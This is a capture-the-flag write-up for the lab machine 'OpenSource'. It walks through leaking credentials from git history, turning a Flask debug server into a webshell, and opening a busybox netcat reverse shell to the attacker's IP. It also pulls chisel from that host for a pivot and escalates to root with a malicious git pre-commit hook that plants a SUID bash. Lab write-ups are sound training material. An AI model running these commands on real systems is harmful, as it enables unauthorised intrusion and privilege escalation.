OpenSource

Recon

nmap_scan.log
Open 10.129.227.140:22
Open 10.129.227.140:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.140

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOm3Ocn3qQzvKFsAf8u2wdkpi0XryPX5W33bER74CfZxc4QPasF+hGBNSaCanZpccGuPffJ9YenksdoTNdf35cvhamsBUq6TD88Cyv9Qs68kWPJD71MkSDgoyMFIe7NTdzyWJJjmUcNHRvwfo6KQsVXjwC4MN+SkL6dLfAY4UawSNhJZGTiKu0snAV6TZ5ZYnmDpnKIEZzf/dOK6bBu4SCu9DRjPknuZkl7sKp3VCoI9CRIu1tihqs1NPhFa+XnHSRsULWtQqtmxZP5UXbmgwETxmpfw8M9XcMH0QXr8JSAdDkg2NtIapmPX/a3hVFATYg+idaEEQNlZHPUKLbCTyJ
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLA9ak8TUAPl/F77SPc1ut/8B+eOukyC/0lof4IrqJoPJLYusbXk+9u/OgSGp6bJZhotkJUvhC7k0rsA7WX19Y8=
|   256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINxEEb33GC5nT5IJ/YY+yDpTKQGLOK1HPsEzM99H4KKA
80/tcp open  http    syn-ack Werkzeug httpd 2.1.2 (Python 3.10.3)
|_http-title: upcloud - Upload files for Free!
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Writeup.png

Git

Download the source

└─$ curl -Ls http://10.129.227.140/download -o source.zip
└─$ unzip source.zip -d source

Source code contains the credentials for the user

└─$ git branch -a      
  dev
* public
└─$ git checkout dev   
Switched to branch 'dev'
└─$ git log --oneline --graph
* c41fede (HEAD -> dev) ease testing
* be4da71 added gitignore
* a76f8f7 updated
* ee9d9f1 initial
└─$ git log -p
...
-{
-  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
-  "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
-  "http.proxyStrictSSL": false
-}
...

Credentials don't work..

└─$ sshpass -p 'Soulless_Developer#2022' ssh dev01@10.129.227.140
dev01@10.129.227.140: Permission denied (publickey).

RCE

Because the application is running in Debug mode we can overwrite the source files it's using and debug mode will reload those files. Meaning we can add something like custom path and make it act as a webshell.

Writeup-1.png

/bin/bash doesn't exist, so we can use /bin/sh. Since we are inside container busybox also exists and it supports nc.

Note: which <program> to find if it exists.

└─$ curl http://10.129.227.140/letmein --data-urlencode '0=busybox nc 10.10.14.113 4444 -e /bin/sh'

Reverse Shell

└─$ nc -lvnp 4444
Ncat: Connection from 10.129.227.140:46167.
/bin/sh -i
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

There's another host on the network

/app # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:03
          inet addr:172.17.0.3  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:822 errors:0 dropped:0 overruns:0 frame:0
          TX packets:638 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:80745 (78.8 KiB)  TX bytes:330515 (322.7 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
/app # arp -a
? (172.17.0.1) at 02:42:11:8f:39:87 [ether]  on eth0

Upgrade shell: https://book.hacktricks.xyz/sw/generic-methodologies-and-resources/reverse-shells/full-ttys#python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
~ # for port in $(seq 1 10000); do busybox nc -w 1 -zv 172.17.0.1 $port; done;
172.17.0.1 (172.17.0.1:22) open
172.17.0.1 (172.17.0.1:80) open
172.17.0.1 (172.17.0.1:3000) open
172.17.0.1 (172.17.0.1:6000) open
172.17.0.1 (172.17.0.1:6001) open
172.17.0.1 (172.17.0.1:6002) open
172.17.0.1 (172.17.0.1:6003) open
172.17.0.1 (172.17.0.1:6004) open
172.17.0.1 (172.17.0.1:6005) open
172.17.0.1 (172.17.0.1:6006) open
172.17.0.1 (172.17.0.1:6007) open

Port 600{x} is odd, but it seems to be the same application as port 80.

~ # wget 172.17.0.1:6000 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -
~ # wget 172.17.0.1:6001 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -
~ # wget 172.17.0.1:6002 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -
~ # wget 172.17.0.1 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -

3000 is different

~ # wget 172.17.0.1:3000 -qO- |md5sum
5bf013873bbead3add84a3f2f7c8b19c  -

It seems to be Gitea instance

~ # wget 172.17.0.1:3000 -qO-  |grep Gitea
        <title> Gitea: Git with a cup of tea</title>
        <meta name="author" content="Gitea - Git with a cup of tea" />
        <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
        <meta property="og:title" content="Gitea: Git with a cup of tea">
        <meta property="og:description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go">
<meta property="og:site_name" content="Gitea: Git with a cup of tea" />
                                        Gitea: Git with a cup of tea
                                Gitea runs anywhere <a target="_blank" rel="noopener noreferrer nofollow" href="http://golang.org/">Go</a> can compile for: Windows, macOS, Linux, ARM, etc. Choose the one you love!
                                Gitea has low minimal requirements and can run on an inexpensive Raspberry Pi. Save your machine energy!
                        Powered by Gitea Version: 1.16.6 Page: <strong>1ms</strong> Template: <strong>1ms</strong>

Let's port forward it with Chisel. Odd thing during testing was that any request going to 80 was going to main server?? My ip, but it was still going to it's 80 and like wtf? Changing port got callback.

└─$ chisel server -p 36000 --reverse
---
/tmp # wget http://10.10.14.113:8000/chisel -q -O /tmp/chisel
/tmp # chmod +x /tmp/chisel
/tmp # /tmp/chisel client 10.10.14.113:36000 R:3000:172.17.0.1:3000 &

We can create account, but nothing

Writeup-2.png

Previously found credentials work.

Creds: dev01:Soulless_Developer#2022

Writeup-3.png

SSH (22)

Using the SSH key works.

└─$ nano dev01.id_rsa
└─$ chmod 600 *.id_rsa
└─$ ssh -i dev01.id_rsa dev01@10.129.227.140
dev01@opensource:~$ id
uid=1000(dev01) gid=1000(dev01) groups=1000(dev01)

User.txt

dev01@opensource:~$ cat user.txt
30650232b08f7d0374680472a04d7b32

Privilege Escalation

No sudo privs.

dev01@opensource:~$ curl 10.10.14.113/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Executable files potentially added by user (limit 70)
2022-03-23+00:26:19.9865825590 /usr/local/bin/git-sync
2022-03-21+22:12:49.1495633880 /opt/gitlab/sv/grafana/log/run
2022-03-21+22:12:49.0935625310 /opt/gitlab/sv/grafana/run
...
dev01@opensource:~$ cat /usr/local/bin/git-sync
#!/bin/bash

cd /home/dev01/

if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi

Git status shows the changes made inside home directory (because of .git), but the above bash script is wrong and condition is always true and repo is getting updated.

dev01@opensource:~$ echo x > x
dev01@opensource:~$ git status --porcelain;
?? x

We can observe the change with ps or pspy, but it's most probably a cronjob script.

https://gtfobins.github.io/gtfobins/git/ (d)

dev01@opensource:~$ echo $'#!/bin/bash\ninstall -m4777 /bin/bash /tmp/rootbash' > ~/.git/hooks/pre-commit
dev01@opensource:~$ chmod +x ~/.git/hooks/pre-commit

After some time

dev01@opensource:~$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1113504 Dec 14 18:40 /tmp/rootbash
dev01@opensource:~$ /tmp/rootbash -p
rootbash-4.4# id
uid=1000(dev01) gid=1000(dev01) euid=0(root) groups=1000(dev01)

User.txt

rootbash-4.4# cat /root/root.txt
885d562e2cb9693f8f42855cea2a18ef
PreviousOnlyForYouNextPC

Last updated